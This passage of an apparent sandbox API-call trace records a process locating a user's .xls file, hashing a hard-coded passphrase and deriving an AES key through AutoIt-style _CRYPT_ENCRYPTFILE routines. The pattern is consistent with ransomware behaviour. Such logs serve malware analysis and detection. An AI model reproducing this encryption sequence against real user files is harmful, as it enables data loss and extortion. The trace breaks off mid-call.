[0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.391] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.391] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.392] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.395] CloseHandle (hObject=0x258) returned 1 [0079.395] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.395] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a31040, ftCreationTime.dwHighDateTime=0x1d5e638, ftLastAccessTime.dwLowDateTime=0xf70ffc60, ftLastAccessTime.dwHighDateTime=0x1d5eebc, ftLastWriteTime.dwLowDateTime=0xf70ffc60, ftLastWriteTime.dwHighDateTime=0x1d5eebc, nFileSizeHigh=0x0, nFileSizeLow=0x12f5a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="IVMtcxmHJDptt31P9OCD.xls", cAlternateFileName="IVMTCX~1.XLS")) returned 0x41ac280 [0079.395] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0079.395] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.396] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4948) returned 1 [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.397] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.397] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabe0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.397] CryptCreateHash (in: hProv=0x41a4948, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.397] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.398] CryptHashData (hHash=0x41ac500, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.398] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.398] CryptDeriveKey (in: hProv=0x41a4948, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0079.400] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0079.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0079.401] RtlAllocateHeap 